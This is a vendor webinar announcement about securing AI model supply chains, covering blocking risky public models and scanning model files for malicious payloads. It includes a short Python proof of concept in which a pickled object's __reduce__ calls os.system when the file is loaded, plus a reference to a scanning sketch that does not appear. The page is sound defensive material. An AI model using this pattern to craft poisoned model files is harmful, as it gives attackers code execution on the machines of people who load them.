Securing AI Models: From Public Repos to Custom-Built Models

February 3rd, 2026 | 8 AM PST | 5 PM CET

As organizations race to adopt AI, the gap between rapid model adoption and robust security is widening. Data scientists frequently download and run opaque binary model files locally, risking Remote Code Execution (RCE), while platform teams struggle to govern which models actually make it into production.
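
To make that risk concrete, here is a minimal illustration (not taken from the session itself) of why loading an untrusted pickle-based model file is equivalent to running its author's code: Python's pickle protocol lets an object nominate a callable to be invoked during deserialization, so a hostile file executes the moment it is loaded.

    import os
    import pickle

    # Minimal sketch of pickle-based RCE: an attacker-crafted object tells
    # pickle to call an arbitrary function (here os.system) at load time.
    class MaliciousPayload:
        def __reduce__(self):
            # pickle invokes this (callable, args) pair during unpickling.
            return (os.system, ("echo 'this ran the moment the file was loaded'",))

    blob = pickle.dumps(MaliciousPayload())  # what a poisoned "model file" contains

    # The victim only has to load the file -- no weights are ever touched:
    pickle.loads(blob)  # executes the shell command above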

This technical spotlight session will demonstrate a unified approach to protecting your AI supply chain. We'll start with the JFrog AI Catalog, showing how to identify dangerous public models (such as those from Hugging Face) and block them from entering your organization.

Then, we’ll dive into our latest release: the 1st Party AI Malicious Model Scanner. Through a live demo, we will show you how to close the loop between local development and global governance:

  • Scan Locally: Use the jf malicious-scan CLI command to detect malicious payloads (in Pickle, PyTorch, Keras, and other formats) on your local machine before loading them (see the sketch after this list).
  • Log & Centralize: See how to take a verified clean model and log it directly into the AI Catalog.

What You'll Learn:

  • Spot Threats Early: Identify RCE attempts and malicious logic in local binaries with clear evidence logs.
  • Bridge the Gap: Connect local data science workflows with enterprise security policies.
  • Automate Protection: Block risky models at the gateway and prevent them from polluting your supply chain.
  • Manage the Lifecycle: Track models from a local CLI scan all the way to a governed release in the catalog.

 

Presenter Information

 
 
 

Rami Pinku | Senior Product Manager, ML

Ariel Antoni | Senior Product Manager, Security
 
 
 
 
 
 

Terms of Use | Privacy Notice | Read Our Blog | Start for Free | Contact Us

 

© 2026 JFrog Inc. All rights reserved.

 
